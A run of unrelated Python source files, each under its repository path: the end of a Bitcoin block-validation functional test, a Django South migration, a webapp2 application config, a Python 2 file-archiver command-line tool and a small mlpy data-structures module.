b73 = self.update_block(73, [tx])
assert_equal(get_legacy_sigopcount_block(b73), MAX_BLOCK_SIGOPS + 1)
self.sync_blocks([b73], False, 16, b'bad-blk-sigops', reconnect=True)
# b74/b75 - if we push an invalid script element, all previous sigops are counted,
# but sigops after the element are not counted.
#
# The script element is invalid because its push_data length field claims far
# more data (~4 GB) than we actually provide. The bytes that follow are
# CHECKSIGS, so they would cause b75 to fail for excessive sigops if they
# were counted.
#
# b74 fails because we put MAX_BLOCK_SIGOPS+1 before the element
# b75 succeeds because we put MAX_BLOCK_SIGOPS before the element
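# Put differently (sketch): legacy sigop counting walks the script opcode by
# opcode, so once a pushdata claims more bytes than remain, parsing fails and
# the scan stops - nothing after the truncated element is counted.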
self.log.info("Check sigops are counted correctly after an invalid script element")
self.move_tip(72)
b74 = self.next_block(74)
size = MAX_BLOCK_SIGOPS - 1 + MAX_SCRIPT_ELEMENT_SIZE + 42 # total = 20,561
a = bytearray([OP_CHECKSIG] * size)
a[MAX_BLOCK_SIGOPS] = 0x4e
a[MAX_BLOCK_SIGOPS + 1] = 0xfe
a[MAX_BLOCK_SIGOPS + 2] = 0xff
a[MAX_BLOCK_SIGOPS + 3] = 0xff
a[MAX_BLOCK_SIGOPS + 4] = 0xff
tx = self.create_and_sign_transaction(out[22], 1, CScript(a))
b74 = self.update_block(74, [tx])
self.sync_blocks([b74], False, 16, b'bad-blk-sigops', reconnect=True)
self.move_tip(72)
b75 = self.next_block(75)
size = MAX_BLOCK_SIGOPS - 1 + MAX_SCRIPT_ELEMENT_SIZE + 42
a = bytearray([OP_CHECKSIG] * size)
a[MAX_BLOCK_SIGOPS - 1] = 0x4e
a[MAX_BLOCK_SIGOPS] = 0xff
a[MAX_BLOCK_SIGOPS + 1] = 0xff
a[MAX_BLOCK_SIGOPS + 2] = 0xff
a[MAX_BLOCK_SIGOPS + 3] = 0xff
tx = self.create_and_sign_transaction(out[22], 1, CScript(a))
b75 = self.update_block(75, [tx])
self.sync_blocks([b75], True)
self.save_spendable_output()
# Check that if we push an element filled with CHECKSIGs, they are not counted
self.move_tip(75)
b76 = self.next_block(76)
size = MAX_BLOCK_SIGOPS - 1 + MAX_SCRIPT_ELEMENT_SIZE + 1 + 5
a = bytearray([OP_CHECKSIG] * size)
a[MAX_BLOCK_SIGOPS - 1] = 0x4e # PUSHDATA4, but leave the following bytes as just checksigs
tx = self.create_and_sign_transaction(out[23], 1, CScript(a))
b76 = self.update_block(76, [tx])
self.sync_blocks([b76], True)
self.save_spendable_output()
# Test transaction resurrection
#
# -> b77 (24) -> b78 (25) -> b79 (26)
# \-> b80 (25) -> b81 (26) -> b82 (27)
#
# b78 creates a tx, which is spent in b79. After b82, both should be in mempool
#
# The txs must be unsigned and pass the node's mempool policy. They are unsigned
# because the Python signature code does not distinguish between low-S and
# high-S values (whereas the bitcoin code has custom logic which does); as a
# result, the odds are only 50% that the Python code will produce the right
# value and the transaction will be accepted into the mempool. Until we modify
# the test framework to support low-S signing, we are out of luck.
#
# To get around this issue, we construct transactions which are not signed and which
# spend to OP_TRUE. If the standard-ness rules change, this test would need to be
# updated. (Perhaps to spend to a P2SH OP_TRUE script)
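# Background (sketch): for ECDSA, (r, s) and (r, N - s) are both valid
# signatures for the same key and message, where N is the curve order; node
# standardness policy accepts only the low-S form (s <= N/2), which the
# framework's signer does not guarantee.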
self.log.info("Test transaction resurrection during a re-org")
self.move_tip(76)
b77 = self.next_block(77)
tx77 = self.create_and_sign_transaction(out[24], 10 * COIN)
b77 = self.update_block(77, [tx77])
self.sync_blocks([b77], True)
self.save_spendable_output()
b78 = self.next_block(78)
tx78 = self.create_tx(tx77, 0, 9 * COIN)
b78 = self.update_block(78, [tx78])
self.sync_blocks([b78], True)
b79 = self.next_block(79)
tx79 = self.create_tx(tx78, 0, 8 * COIN)
b79 = self.update_block(79, [tx79])
self.sync_blocks([b79], True)
# mempool should be empty
assert_equal(len(self.nodes[0].getrawmempool()), 0)
self.move_tip(77)
b80 = self.next_block(80, spend=out[25])
self.sync_blocks([b80], False, request_block=False)
self.save_spendable_output()
b81 = self.next_block(81, spend=out[26])
self.sync_blocks([b81], False, request_block=False) # other chain is same length
self.save_spendable_output()
b82 = self.next_block(82, spend=out[27])
self.sync_blocks([b82], True) # now this chain is longer, triggers re-org
self.save_spendable_output()
# now check that tx78 and tx79 have been put back into the peer's mempool
mempool = self.nodes[0].getrawmempool()
assert_equal(len(mempool), 2)
assert(tx78.hash in mempool)
assert(tx79.hash in mempool)
# Test invalid opcodes in dead execution paths.
#
# -> b81 (26) -> b82 (27) -> b83 (28)
#
self.log.info("Accept a block with invalid opcodes in dead execution paths")
b83 = self.next_block(83)
op_codes = [OP_IF, OP_INVALIDOPCODE, OP_ELSE, OP_TRUE, OP_ENDIF]
script = CScript(op_codes)
tx1 = self.create_and_sign_transaction(out[28], out[28].vout[0].nValue, script)
tx2 = self.create_and_sign_transaction(tx1, 0, CScript([OP_TRUE]))
tx2.vin[0].scriptSig = CScript([OP_FALSE])
tx2.rehash()
b83 = self.update_block(83, [tx1, tx2])
self.sync_blocks([b83], True)
self.save_spendable_output()
# Reorg on/off blocks that have OP_RETURN in them (and try to spend them)
#
# -> b81 (26) -> b82 (27) -> b83 (28) -> b84 (29) -> b87 (30) -> b88 (31)
# \-> b85 (29) -> b86 (30) \-> b89a (32)
#
self.log.info("Test re-orging blocks with OP_RETURN in them")
b84 = self.next_block(84)
tx1 = self.create_tx(out[29], 0, 0, CScript([OP_RETURN]))
tx1.vout.append(CTxOut(0, CScript([OP_TRUE])))
tx1.vout.append(CTxOut(0, CScript([OP_TRUE])))
tx1.vout.append(CTxOut(0, CScript([OP_TRUE])))
tx1.vout.append(CTxOut(0, CScript([OP_TRUE])))
tx1.calc_sha256()
self.sign_tx(tx1, out[29])
tx1.rehash()
tx2 = self.create_tx(tx1, 1, 0, CScript([OP_RETURN]))
tx2.vout.append(CTxOut(0, CScript([OP_RETURN])))
tx3 = self.create_tx(tx1, 2, 0, CScript([OP_RETURN]))
tx3.vout.append(CTxOut(0, CScript([OP_TRUE])))
tx4 = self.create_tx(tx1, 3, 0, CScript([OP_TRUE]))
tx4.vout.append(CTxOut(0, CScript([OP_RETURN])))
tx5 = self.create_tx(tx1, 4, 0, CScript([OP_RETURN]))
b84 = self.update_block(84, [tx1, tx2, tx3, tx4, tx5])
self.sync_blocks([b84], True)
self.save_spendable_output()
self.move_tip(83)
b85 = self.next_block(85, spend=out[29])
self.sync_blocks([b85], False) # other chain is same length
b86 = self.next_block(86, spend=out[30])
self.sync_blocks([b86], True)
self.move_tip(84)
b87 = self.next_block(87, spend=out[30])
self.sync_blocks([b87], False) # other chain is same length
self.save_spendable_output()
b88 = self.next_block(88, spend=out[31])
self.sync_blocks([b88], True)
self.save_spendable_output()
# trying to spend the OP_RETURN output is rejected
b89a = self.next_block("89a", spend=out[32])
tx = self.create_tx(tx1, 0, 0, CScript([OP_TRUE]))
b89a = self.update_block("89a", [tx])
self.sync_blocks([b89a], False, 16, b'bad-txns-inputs-missingorspent', reconnect=True)
self.log.info("Test a re-org of one week's worth of blocks (1088 blocks)")
self.move_tip(88)
LARGE_REORG_SIZE = 1088
blocks = []
spend = out[32]
for i in range(89, LARGE_REORG_SIZE + 89):
b = self.next_block(i, spend)
tx = CTransaction()
script_length = MAX_BLOCK_BASE_SIZE - len(b.serialize()) - 69
script_output = CScript([b'\x00' * script_length])
tx.vout.append(CTxOut(0, script_output))
tx.vin.append(CTxIn(COutPoint(b.vtx[1].sha256, 0)))
b = self.update_block(i, [tx])
assert_equal(len(b.serialize()), MAX_BLOCK_BASE_SIZE)
blocks.append(b)
self.save_spendable_output()
spend = self.get_spendable_output()
self.sync_blocks(blocks, True, timeout=180)
chain1_tip = i
# now create alt chain of same length
self.move_tip(88)
blocks2 = []
for i in range(89, LARGE_REORG_SIZE + 89):
blocks2.append(self.next_block("alt" + str(i)))
self.sync_blocks(blocks2, False, request_block=False)
# extend alt chain to trigger re-org
block = self.next_block("alt" + str(chain1_tip + 1))
self.sync_blocks([block], True, timeout=180)
# ... and re-org back to the first chain
self.move_tip(chain1_tip)
block = self.next_block(chain1_tip + 1)
self.sync_blocks([block], False, request_block=False)
block = self.next_block(chain1_tip + 2)
self.sync_blocks([block], True, timeout=180)
# Helper methods
################
def add_transactions_to_block(self, block, tx_list):
[tx.rehash() for tx in tx_list]
block.vtx.extend(tx_list)
# this is a little handier to use than the version in blocktools.py
def create_tx(self, spend_tx, n, value, script=CScript([OP_TRUE, OP_DROP] * 15 + [OP_TRUE])):
return create_tx_with_script(spend_tx, n, amount=value, script_pub_key=script)
# sign a transaction, using the key we know about
# this signs input 0 in tx, which is assumed to be spending output n in spend_tx
def sign_tx(self, tx, spend_tx):
scriptPubKey = bytearray(spend_tx.vout[0].scriptPubKey)
if (scriptPubKey[0] == OP_TRUE): # an anyone-can-spend
tx.vin[0].scriptSig = CScript()
return
(sighash, err) = SignatureHash(spend_tx.vout[0].scriptPubKey, tx, 0, SIGHASH_ALL)
tx.vin[0].scriptSig = CScript([self.coinbase_key.sign(sighash) + bytes(bytearray([SIGHASH_ALL]))])
def create_and_sign_transaction(self, spend_tx, value, script=CScript([OP_TRUE])):
tx = self.create_tx(spend_tx, 0, value, script)
self.sign_tx(tx, spend_tx)
tx.rehash()
return tx
def next_block(self, number, spend=None, additional_coinbase_value=0, script=CScript([OP_TRUE]), solve=True):
if self.tip is None:
base_block_hash = self.genesis_hash
block_time = int(time.time()) + 1
else:
base_block_hash = self.tip.sha256
block_time = self.tip.nTime + 1
# First create the coinbase
height = self.block_heights[base_block_hash] + 1
coinbase = create_coinbase(height, self.coinbase_pubkey)
coinbase.vout[0].nValue += additional_coinbase_value
coinbase.rehash()
if spend is None:
block = create_block(base_block_hash, coinbase, block_time)
else:
coinbase.vout[0].nValue += spend.vout[0].nValue - 1 # all but one satoshi to fees
coinbase.rehash()
block = create_block(base_block_hash, coinbase, block_time)
tx = self.create_tx(spend, 0, 1, script) # spend 1 satoshi
self.sign_tx(tx, spend)
self.add_transactions_to_block(block, [tx])
block.hashMerkleRoot = block.calc_merkle_root()
if solve:
block.solve()
self.tip = block
self.block_heights[block.sha256] = height
assert number not in self.blocks
self.blocks[number] = block
return block
# save the current tip so it can be spent by a later block
def save_spendable_output(self):
self.log.debug("saving spendable output %s" % self.tip.vtx[0])
self.spendable_outputs.append(self.tip)
# get an output that we previously marked as spendable
def get_spendable_output(self):
self.log.debug("getting spendable output %s" % self.spendable_outputs[0].vtx[0])
return self.spendable_outputs.pop(0).vtx[0]
# move the tip back to a previous block
def move_tip(self, number):
self.tip = self.blocks[number]
# adds transactions to the block and updates state
def update_block(self, block_number, new_transactions):
block = self.blocks[block_number]
self.add_transactions_to_block(block, new_transactions)
old_sha256 = block.sha256
block.hashMerkleRoot = block.calc_merkle_root()
block.solve()
# Update the internal state just like in next_block
self.tip = block
if block.sha256 != old_sha256:
self.block_heights[block.sha256] = self.block_heights[old_sha256]
del self.block_heights[old_sha256]
self.blocks[block_number] = block
return block
def bootstrap_p2p(self):
"""Add a P2P connection to the node.
Helper to connect and wait for version handshake."""
self.nodes[0].add_p2p_connection(P2PDataStore())
# We need to wait for the initial getheaders from the peer before we
# start populating our blockstore. If we don't, then we may run ahead
# to the next subtest before we receive the getheaders. We'd then send
# an INV for the next block and receive two getheaders - one for the
# IBD and one for the INV. We'd respond to both and could get
# unexpectedly disconnected if the DoS score for that error is 50.
self.nodes[0].p2p.wait_for_getheaders(timeout=5)
def reconnect_p2p(self):
"""Tear down and bootstrap the P2P connection to the node.
The node gets disconnected several times in this test. This helper
method reconnects the p2p and restarts the network thread."""
self.nodes[0].disconnect_p2ps()
self.bootstrap_p2p()
def sync_blocks(self, blocks, success=True, reject_code=None, reject_reason=None, request_block=True, reconnect=False, timeout=60):
"""Sends blocks to test node. Syncs and verifies that tip has advanced to most recent block.
Call with success = False if the tip shouldn't advance to the most recent block."""
self.nodes[0].p2p.send_blocks_and_test(blocks, self.nodes[0], success=success, reject_code=reject_code, reject_reason=reject_reason, request_block=request_block, timeout=timeout)
if reconnect:
self.reconnect_p2p()
if __name__ == '__main__':
FullBlockTest().main()
|
atizo/braindump
|
brainstorming/migrations/0005_auto__add_field_idea_color.py
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Idea.color'
db.add_column(u'brainstorming_idea', 'color',
self.gf('django.db.models.fields.CharField')(default='', max_length=100, blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Idea.color'
db.delete_column(u'brainstorming_idea', 'color')
models = {
u'brainstorming.brainstorming': {
'Meta': {'ordering': "['-created']", 'object_name': 'Brainstorming'},
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
'creator_email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'creator_ip': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'details': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
'question': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
u'brainstorming.brainstormingwatcher': {
'Meta': {'ordering': "['-created']", 'unique_together': "(('brainstorming', 'email'),)", 'object_name': 'BrainstormingWatcher'},
'brainstorming': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['brainstorming.Brainstorming']"}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'})
},
u'brainstorming.emailverification': {
'Meta': {'ordering': "['-created']", 'object_name': 'EmailVerification'},
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'id': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'})
},
u'brainstorming.idea': {
'Meta': {'ordering': "['-created']", 'object_name': 'Idea'},
'brainstorming': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['brainstorming.Brainstorming']"}),
'color': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
'creator_ip': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'creator_name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
'ratings': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'text': ('django.db.models.fields.TextField', [], {}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'})
}
}
complete_apps = ['brainstorming']
|
onejgordon/action-potential
|
actionpotential.py
|
import os
import webapp2
from actions import cronActions
from views import views
import secrets
SECS_PER_WEEK = 60 * 60 * 24 * 7
# Enable ctypes -> Jinja2 tracebacks
PRODUCTION_MODE = not os.environ.get(
'SERVER_SOFTWARE', 'Development').startswith('Development')
ROOT_DIRECTORY = os.path.dirname(__file__)
if not PRODUCTION_MODE:
from google.appengine.tools.devappserver2.python import sandbox
sandbox._WHITE_LIST_C_MODULES += ['_ctypes', 'gestalt']
TEMPLATE_DIRECTORY = os.path.join(ROOT_DIRECTORY, 'src')
else:
TEMPLATE_DIRECTORY = os.path.join(ROOT_DIRECTORY, 'dist')
curr_path = os.path.abspath(os.path.dirname(__file__))
config = {
'webapp2_extras.sessions': {
'secret_key': secrets.COOKIE_KEY,
'session_max_age': SECS_PER_WEEK,
'cookie_args': {'max_age': SECS_PER_WEEK},
'cookie_name': 'echo_sense_session'
},
'webapp2_extras.jinja2': {
'template_path': TEMPLATE_DIRECTORY
}
}
app = webapp2.WSGIApplication(
[
# Cron jobs (see cron.yaml)
webapp2.Route('/cron/monthly', handler=cronActions.Monthly),
webapp2.Route(r'/<:.*>', handler=views.ActionPotentialApp, name="ActionPotentialApp"),
], debug=True, config=config)
|
jdthorpe/archiver
|
__main__.py
|
# this is the interface for `python archiver`
import archiver
import appdirs
import os
import sys
import pickle
import json
from archiver.archiver import Archiver
from archiver.parser import parseArgs
args = parseArgs()
from edit import edit
# ==============================================
print args
# TODO: see http://stackoverflow.com/questions/13168083/python-raw-input-replacement-that-uses-a-configurable-text-editor
#-- import pdb
#-- pdb.set_trace()
# ------------------------------------------------------------
# load the user data
# ------------------------------------------------------------
# get the user data directory
user_data_dir = appdirs.user_data_dir('FileArchiver', 'jdthorpe')
if not os.path.exists(user_data_dir) :
os.makedirs(user_data_dir)
# LOAD THE INDEX NAMES AND ACTIVE INDEX
indexes_path = os.path.join(user_data_dir,'INDEXES.json')
if os.path.exists(indexes_path):
with open(indexes_path,'rb') as fh:
indexes = json.load(fh)
else:
indexes= {'active':None,'names':[]}
if not os.path.exists(user_data_dir):
os.makedirs(user_data_dir)
def dumpIndexes():
with open(indexes_path,'wb') as fh:
json.dump(indexes,fh)
# ------------------------------------------------------------
# ------------------------------------------------------------
def getActiveName():
# ACTIVE INDEX NUMBER
activeIndex = indexes['active']
if activeIndex is None:
print "No active index. Use 'list -i' to list available indexies and 'use' to set an active index."
sys.exit()
# GET THE NAME OF THE INDEX
try:
activeIndexName = indexes['names'][indexes['active']]
except:
print "Invalid index number"
sys.exit()
return activeIndexName
# ------------------------------------------------------------
# READ-WRITE UTILITY FUNCTIONS
# ------------------------------------------------------------
# TODO: catch specific exceptions:
# except IOError:
# # no such file
# except ValueError as e:
# # invalid json file
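# A sketch of what that handling might look like (hypothetical, matching the
# TODO above):
#
# try:
#     with open(path, 'rb') as fh:
#         settings = json.load(fh)
# except IOError:
#     print "No settings file for index '%s'" % name
#     sys.exit()
# except ValueError:
#     print "Settings file for index '%s' is not valid JSON" % name
#     sys.exit()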
def readSettings(name):
""" A utility function which loads the index settings from file
"""
try:
with open(os.path.join(user_data_dir,name+".settings"),'rb') as fh:
settings = json.load(fh)
except Exception as e:
print "Error reading index settings"
import pdb
pdb.set_trace()
sys.exit()
return settings
def readData(name):
""" A utility function which loads the index data from file
"""
try:
with open(os.path.join(user_data_dir,name+".data"),'rb') as fh: data = pickle.load(fh)
except Exception as e:
print "Error reading index data"
import pdb
pdb.set_trace()
sys.exit()
return data
def dumpSettings(settings,name):
""" A utility function which saves the index settings to file
"""
try:
with open(os.path.join(user_data_dir,name+".settings"),'wb') as fh:
json.dump(settings,fh)
except Exception as e:
print "Error writing index settings"
import pdb
pdb.set_trace()
sys.exit()
def dumpData(data,name):
""" A utility function which saves the index settings to file
"""
try:
with open(os.path.join(user_data_dir,name+".data"),'wb') as fh:
pickle.dump(data,fh)
except:
print "Error writing index data"
import pdb
pdb.set_trace()
sys.exit()
# ------------------------------------------------------------
# ------------------------------------------------------------
if args.command == 'add':
activeName = getActiveName()
settings = readSettings(activeName)
if args.source is not None:
source = os.path.abspath(args.source)
if not os.path.exists(source):
print 'WARNING: no such directory "%s"'%(source)
elif not os.path.isdir(source):
print 'ERROR: "%s" is not a directory'%(source)
sys.exit()
print 'Adding source directory: %s'%(source)
if not any(os.path.samefile(source,f) for f in settings['sourceDirectories']):
settings['sourceDirectories'].append(source)
elif args.exclusion is not None:
import re
try:
re.compile(args.exclusion)
except re.error:
print 'Invalid regular expression "%s"'%(args.exclusion)
sys.exit()
if args.noic:
settings['directoryExclusionPatterns'].append(args.exclusion)
else:
settings['directoryExclusionPatterns'].append((args.exclusion,2)) # re.I == 2
elif args.archive is not None:
raise NotImplementedError
if settings['archiveDirectory'] is not None:
print "Archive path has already been set use 'remove' to delete the archive path before setting a new archive path"
archiveDirectory = os.path.abspath(args.archive)
if not os.path.exists(archiveDirectory):
if args.create :
os.makedirs(archiveDirectory)
else:
print 'ERROR: no such directory "%s"'%(archiveDirectory)
sys.exit()
elif not os.path.isdir(archiveDirectory):
print '"%s" is not a directory'%(archiveDirectory)
sys.exit()
print 'Setting archive directory to: %s'%(archiveDirectory)
settings['archiveDirectory'] = archiveDirectory
else:
raise NotImplementedError
print 'Error in Arg Parser'
sys.exit()
dumpSettings(settings,activeName)
elif args.command == 'list':
if args.sources:
for f in readSettings(getActiveName())['sourceDirectories']:
print f
elif args.exclusions:
for f in readSettings(getActiveName())['directoryExclusionPatterns']:
print f
elif args.archive:
print readSettings(getActiveName())['archiveDirectory']
elif args.files:
archiver = Archiver()
archiver.data = readData(getActiveName())
for f in archiver:
print f
elif args.indexes:
print 'Active Index: %s (*)'%(getActiveName())
print 'Index Names: '
for i,name in enumerate(indexes['names']):
print ' %s %i: %s'%(
(' ','*')[(i == indexes['active'])+0],
i+1,
name,
)
else:
print 'Error in Arg Parser'
elif args.command == 'remove':
activeName = getActiveName()
settings = readSettings(activeName)
if args.source is not None:
if not (1 <= args.source <= len(settings['sourceDirectories'])):
print 'Invalid index %i'%(args.source)
sys.exit()
del settings['sourceDirectories'][args.source - 1]
elif args.exclusion is not None:
raise NotImplementedError
if not (1 <= args.exclusion <= len(settings['directoryExclusionPatterns'])):
print 'Invalid index %i'%(args.exclusion)
del settings['directoryExclusionPatterns'][args.exclusion - 1]
elif args.archive is not None:
raise NotImplementedError
settings['archiveDirectory'] = None
else:
raise NotImplementedError
print 'Error in Arg Parser'
sys.exit()
dumpSettings(settings,activeName)
elif args.command == 'update':
activeName = getActiveName()
settings = readSettings(activeName)
if not len(settings['sourceDirectories']):
print "Error: no source directories in the active index. Please add a source directory via 'add -s'"
sys.exit()
archiver = Archiver(
settings = readSettings(activeName),
data = readData(activeName))
archiver.update()
dumpSettings(archiver.settings,activeName)
dumpData(archiver.data,activeName)
elif args.command == 'clean':
raise NotImplementedError
activeName = getActiveName()
archiver = Archiver(
settings = readSettings(activeName),
data = readData(activeName))
archiver.clean()
dumpSettings(archiver.settings,activeName)
dumpData(archiver.data,activeName)
elif args.command == 'copy':
raise NotImplementedError
activeName = getActiveName()
settings = readSettings(activeName)
if settings['archiveDirectory'] is None:
print "ERROR Archive directory not set. Use 'add -a' to set the archive directory."
sys.exit()
Index(
settings = settings,
data = readData(activeName)).copy()
elif args.command == 'diskimages':
raise NotImplementedError
if args.size is None or args.size == "DVD":
size = 4.65*1<<20
elif args.size == "CD":
size = 645*1<<20
elif args.size == "DVD":
size = 4.65*1<<20
elif args.size == "DVD-dual":
size = 8.5*1<<30
elif args.size == "BD":
size = 25*1<<30
elif args.size == "BD-dual":
size = 50*1<<30
elif args.size == "BD-tripple":
size = 75*1<<30
elif args.size == "BD-xl":
size = 100*1<<30
else:
try:
size = int(float(args.size))
except:
print 'ERROR: unable to coerce "%s" to float or int'%(args.size)
sys.exit()
activeName = getActiveName()
settings = readSettings(activeName)
# GET THE DIRECTORY ARGUMENT
if args.directory is not None:
directory = args.directory
else:
if settings['archiveDirectory'] is None:
print "ERROR Archive directory not set and no directory specified. Use 'diskimages -d' to specifiy the disk image directory or 'add -a' to set the archive directory."
sys.exit()
else:
directory = os.path.join(settings['archiveDirectory'],'Disk Images')
# VALIDATE THE DIRECTORY
if not os.path.exists(directory):
if args.create :
os.makedirs(directory)
else:
print 'ERROR: no such directory "%s"'%(directory)
sys.exit()
elif not os.path.isdir(directory):
print '"%s" is not a directory'%(directory)
sys.exit()
# get the FPBF argument
if args.fpbf is not None:
FPBF = True
elif args.nofpbf is not None:
FPBF = False
else:
FPBF = sys.platform == 'darwin'
Index( settings = settings,
data = readData(activeName)).diskimages(directory,size,FPBF)
elif args.command == 'settings':
activeName = getActiveName()
if args.export is not None:
raise NotImplementedError
with open(args.export,'wb') as fh:
json.dump(readSettings(activeName),fh,indent=2,separators=(',', ': '))
elif args.load is not None:
raise NotImplementedError
with open(args.load,'rb') as fh:
settings = json.load(fh)
# give a chance for the settings to be validated
try:
archiver = Archiver(settings=settings)
except:
print "ERROR: invalid settings file"
sys.exit()
dumpSettings(archiver.settings,activeName)
elif args.edit is not None:
settings = readSettings(activeName)
old = settings['identifierSettings'][args.edit]
new = edit(json.dumps(old,indent=2,separators=(',', ': ')))
settings['identifierSettings'][args.edit]= json.loads(new)
dumpSettings(settings,activeName)
else :
print json.dumps(readSettings(activeName),indent=2,separators=(',', ': '))
elif args.command == 'create':
if args.name in indexes['names']:
print "An index by the name '%s' already exists"%(args.name)
sys.exit()
import re
validater = re.compile(r'^[-() _a-zA-Z0-9](?:[-() _.a-zA-Z0-9]*[-() _a-zA-Z0-9])?$')
if validater.match(args.name) is None:
print "ERROR: names must be composed of letters, numbers, hypen, underscore, space and dot charactes an not end or begin with a dot"
sys.exit()
archiver = Index()
dumpSettings(archiver.settings,args.name)
dumpData(archiver.data,args.name)
indexes['names'].append(args.name)
dumpIndexes()
# TODO: check if there are no other indexes; if so, make the new one active.
print "Created index '%s'"%(args.name)
elif args.command == 'save':
raise NotImplementedError
Index( settings = readSettings(getActiveName()),
data = readData(getActiveName())).save(args.filename)
elif args.command == 'use':
print indexes['names']
if not args.name in indexes['names']:
print "ERROR: No such index named '%s'"%(args.name)
sys.exit()
indexes['active'] = indexes['names'].index(args.name)
dumpIndexes()
elif args.command == 'delete':
if not args.name in indexes['names']:
print "ERROR: No such index named '%s'"%(args.name)
sys.exit()
nameIndex = indexes['names'].index(args.name)
if indexes['active'] == nameIndex:
print 'WARNING: deleting active index'
indexes['active'] = None
del indexes['names'][nameIndex]
dumpIndexes()
else:
print "unknown command %s"%(args.command)
|
evenmarbles/mlpy
|
mlpy/auxiliary/datastructs.py
|
"""
.. module:: mlpy.auxiliary.datastructs
:platform: Unix, Windows
:synopsis: Provides data structure implementations.
.. moduleauthor:: Astrid Jackson <ajackson@eecs.ucf.edu>
"""
from __future__ import division, print_function, absolute_import
import heapq
import numpy as np
from abc import ABCMeta, abstractmethod
class Array(object):
"""The managed array class.
The managed array class pre-allocates memory to the given size
automatically resizing as needed.
Parameters
----------
size : int
The size of the array.
Examples
--------
>>> a = Array(5)
>>> a[0] = 3
>>> a[1] = 6
Retrieving an element:
>>> a[0]
3.0
>>> a[2]
0.0
Finding the length of the array:
>>> len(a)
2
"""
def __init__(self, size):
self._data = np.zeros((size,))
self._capacity = size
self._size = 0
def __setitem__(self, index, value):
"""Set the the array at the index to the given value.
Parameters
----------
index : int
The index into the array.
value :
The value to set the array to.
"""
if index >= self._size:
if index >= self._capacity:
# grow until the index fits; doubling keeps appends amortized O(1)
while index >= self._capacity:
self._capacity *= 2
new_data = np.zeros((self._capacity,))
new_data[:self._size] = self._data
self._data = new_data
self._size = index + 1
self._data[index] = value
def __getitem__(self, index):
"""Get the value at the given index.
Parameters
----------
index : int
The index into the array.
"""
return self._data[index]
def __len__(self):
"""The length of the array.
Returns
-------
int :
The size of the array
"""
return self._size
class Point2D(object):
"""The 2d-point class.
The 2d-point class is a container for positions
in a 2d-coordinate system.
Parameters
----------
x : float, optional
The x-position in a 2d-coordinate system. Default is 0.0.
y : float, optional
The y-position in a 2d-coordinate system. Default is 0.0.
Attributes
----------
x : float
The x-position in a 2d-coordinate system.
y : float
The y-position in a 2d-coordinate system.
"""
__slots__ = ['x', 'y']
def __init__(self, x=0.0, y=0.0):
self.x = x
self.y = y
class Point3D(object):
"""
The 3d-point class.
The 3d-point class is a container for positions
in a 3d-coordinate system.
Parameters
----------
x : float, optional
The x-position in a 3d-coordinate system. Default is 0.0.
y : float, optional
The y-position in a 3d-coordinate system. Default is 0.0.
z : float, optional
The z-position in a 3d-coordinate system. Default is 0.0.
Attributes
----------
x : float
The x-position in a 3d-coordinate system.
y : float
The y-position in a 3d-coordinate system.
z : float
The z-position in a 3d-coordinate system.
"""
__slots__ = ['x', 'y', 'z']
def __init__(self, x=0.0, y=0.0, z=0.0):
self.x = x
self.y = y
self.z = z
class Vector3D(Point3D):
"""The 3d-vector class.
.. todo::
Implement vector functionality.
Parameters
----------
x : float, optional
The x-position in a 3d-coordinate system. Default is 0.0.
y : float, optional
The y-position in a 3d-coordinate system. Default is 0.0.
z : float, optional
The z-position in a 3d-coordinate system. Default is 0.0.
Attributes
----------
x : float
The x-position in a 3d-coordinate system.
y : float
The y-position in a 3d-coordinate system.
z : float
The z-position in a 3d-coordinate system.
"""
def __init__(self, x=0.0, y=0.0, z=0.0):
super(Vector3D, self).__init__(x, y, z)
class Queue(object):
"""The abstract queue base class.
The queue class handles core functionality common for
any type of queue. All queues inherit from the queue
base class.
See Also
--------
:class:`FIFOQueue`, :class:`PriorityQueue`
"""
__metaclass__ = ABCMeta
def __init__(self):
self._queue = []
def __len__(self):
return len(self._queue)
def __contains__(self, item):
try:
self._queue.index(item)
return True
except Exception:
return False
def __iter__(self):
return iter(self._queue)
def __str__(self):
return '[' + ', '.join('{}'.format(el) for el in self._queue) + ']'
def __repr__(self):
return ', '.join('{}'.format(el) for el in self._queue)
@abstractmethod
def push(self, item):
"""Push a new element on the queue
Parameters
----------
item :
The element to push on the queue
"""
raise NotImplementedError
@abstractmethod
def pop(self):
"""Pop an element from the queue."""
raise NotImplementedError
def empty(self):
"""Check if the queue is empty.
Returns
-------
bool :
Whether the queue is empty.
"""
return len(self._queue) <= 0
def extend(self, items):
